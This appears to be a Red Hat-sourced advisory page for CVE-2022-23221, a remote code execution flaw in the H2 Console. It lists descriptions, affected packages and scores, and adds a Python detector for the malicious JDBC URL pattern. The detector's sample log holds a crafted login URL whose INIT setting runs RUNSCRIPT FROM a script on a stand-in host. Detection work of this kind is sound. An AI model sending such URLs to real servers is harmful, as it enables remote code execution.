CVE-2022-23221

Published: 19 Jan 2022
Source: redhat
CVSS3: 9.8
EPSS: Medium

Description

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

A flaw was found in the H2 Console. It allows remote attackers to execute arbitrary code by supplying a JDBC URL whose settings include an INIT=RUNSCRIPT clause, which makes H2 run an attacker-supplied SQL script when the connection is opened.
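
Added here as a worked example (not part of the advisory and not code from the H2 project): a small Python detector that parses the settings part of an H2 JDBC URL, flags the exact combination named above (in-memory database, IGNORE_UNKNOWN_SETTINGS=TRUE, FORBID_CREATION=FALSE, INIT containing RUNSCRIPT), compares an H2 version string against the fixed release 2.1.210, and scans log lines carrying H2 Console login POST bodies. The log line format, the form field name `url`, and all sample inputs are constructed assumptions.

```python
"""Detection helpers for the H2 Console JDBC-URL pattern in CVE-2022-23221.

Added example, not from the advisory or the H2 project. Sample URLs and log
lines below are constructed; the H2 Console login form field name 'url' and
the 'body="..."' log format are assumptions.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

FIXED_VERSION = (2, 1, 210)  # first H2 release with the fix, per the advisory


def parse_h2_url(url: str) -> Tuple[str, Dict[str, str]]:
    """Split 'jdbc:h2:<db>;KEY=VALUE;...' into the db part and its settings.

    H2 setting names are case-insensitive, so keys are upper-cased. H2 allows
    a literal ';' inside a value when escaped as '\\;'; the pattern in this
    advisory does not need that, so a plain split is used (assumption).
    """
    if not url.lower().startswith("jdbc:h2:"):
        raise ValueError("not an H2 JDBC URL")
    db, *raw = url[len("jdbc:h2:"):].split(";")
    settings: Dict[str, str] = {}
    for item in raw:
        if "=" in item:
            key, value = item.split("=", 1)
            settings[key.strip().upper()] = value.strip()
    return db, settings


def init_runs_script(url: str) -> bool:
    """Broad check: any INIT setting that carries a RUNSCRIPT statement."""
    _, settings = parse_h2_url(url)
    return "RUNSCRIPT" in settings.get("INIT", "").upper()


def matches_cve_2022_23221(url: str) -> bool:
    """Strict check for the combination the advisory names.

    FORBID_CREATION=FALSE lets the URL create a fresh in-memory database and
    IGNORE_UNKNOWN_SETTINGS=TRUE stops a pre-2.1.210 Console from rejecting
    the URL over settings it does not recognise.
    """
    db, settings = parse_h2_url(url)
    return (
        db.lower().startswith("mem:")
        and "RUNSCRIPT" in settings.get("INIT", "").upper()
        and settings.get("IGNORE_UNKNOWN_SETTINGS", "").upper() == "TRUE"
        and settings.get("FORBID_CREATION", "").upper() == "FALSE"
    )


def version_is_vulnerable(version: str) -> bool:
    """True when an H2 version string sorts before 2.1.210."""
    nums = tuple(int(n) for n in re.findall(r"\d+", version)[:3])
    nums += (0,) * (3 - len(nums))
    return nums < FIXED_VERSION


BODY_RE = re.compile(r'body="([^"]*)"')


def urls_from_form_body(body: str) -> List[str]:
    """Return every 'url' field of an x-www-form-urlencoded login body."""
    return parse_qs(body).get("url", [])


def scan_log_lines(lines: List[str]) -> List[str]:
    """Return the lines whose logged POST body holds an H2 URL with RUNSCRIPT."""
    hits: List[str] = []
    for line in lines:
        match = BODY_RE.search(line)
        if not match:
            continue
        for url in urls_from_form_body(match.group(1)):
            if url.lower().startswith("jdbc:h2:") and init_runs_script(url):
                hits.append(line)
                break
    return hits


# Constructed sample log lines: a normal login and a RUNSCRIPT login attempt
# against the H2 Console (203.0.113.5 is a documentation-range address).
SAMPLE_LOG = [
    'POST /login.do body="driver=org.h2.Driver&url=jdbc%3Ah2%3A%7E%2Ftest'
    '&user=sa&password="',
    'POST /login.do body="driver=org.h2.Driver&url=jdbc%3Ah2%3Amem%3Ax'
    '%3BIGNORE_UNKNOWN_SETTINGS%3DTRUE%3BFORBID_CREATION%3DFALSE'
    '%3BINIT%3DRUNSCRIPT+FROM+%27http%3A%2F%2F203.0.113.5%2Fx.sql%27'
    '&user=sa&password="',
]

if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG):
        print("suspicious H2 Console login:", hit)
    print("2.1.208 vulnerable:", version_is_vulnerable("2.1.208"))
```

The version check alone is not a complete exposure test: the vulnerable code path is only reachable where the H2 Console is actually started and reachable by the attacker, which is why the OpenShift statement below rates the impact as low for an image that ships the library but never starts the Console.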

Statement

In OpenShift Container Platform (OCP), the openshift-enterprise-3.11/metrics-hawkular-metrics-container container image ships a vulnerable version of h2 as part of its underlying images. However, it uses the standard configuration and the H2 Console is not enabled or started by default, so the impact of this vulnerability is LOW. It will not be fixed, as OCP 3.x has already reached End of Full Support. [1] https://access.redhat.com/support/policy/updates/openshift_noncurrent

Affected packages

Platform                                      Package   State
Red Hat BPM Suite 6                           h2        Out of support scope
Red Hat build of Apicurio Registry 2          h2        Fix deferred
Red Hat Decision Manager 7                    h2        Not affected
Red Hat Integration Camel K 1                 h2        Not affected
Red Hat Integration Camel Quarkus 1           h2        Not affected
Red Hat JBoss BRMS 5                          h2        Out of support scope
Red Hat JBoss BRMS 6                          h2        Out of support scope
Red Hat JBoss Data Grid 7                     h2        Out of support scope
Red Hat JBoss Data Virtualization 6           h2        Out of support scope
Red Hat JBoss Enterprise Application Platform 6   h2    Out of support scope

(The Errata and Release columns are empty for every row listed.)


Additional information

Severity (Red Hat): Important
Weakness: CWE-502
Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=2044596
Bug title: h2: Loading of custom classes from remote servers through JNDI

EPSS

Percentile: 96%
Score: 0.26568 (Medium)

CVSS3: 9.8 Critical

Related vulnerabilities

CVSS3: 9.8
ubuntu
about 4 years ago

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

CVSS3: 9.8
nvd
about 4 years ago

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

CVSS3: 9.8
debian
about 4 years ago

H2 Console before 2.1.210 allows remote attackers to execute arbitrary ...

CVSS3: 9.8
github
about 4 years ago

Arbitrary code execution in H2 Console

CVSS3: 9.8
fstec
about 4 years ago

Vulnerability in the H2 database management system, related to improper control of code generation, that allows an attacker to execute arbitrary code.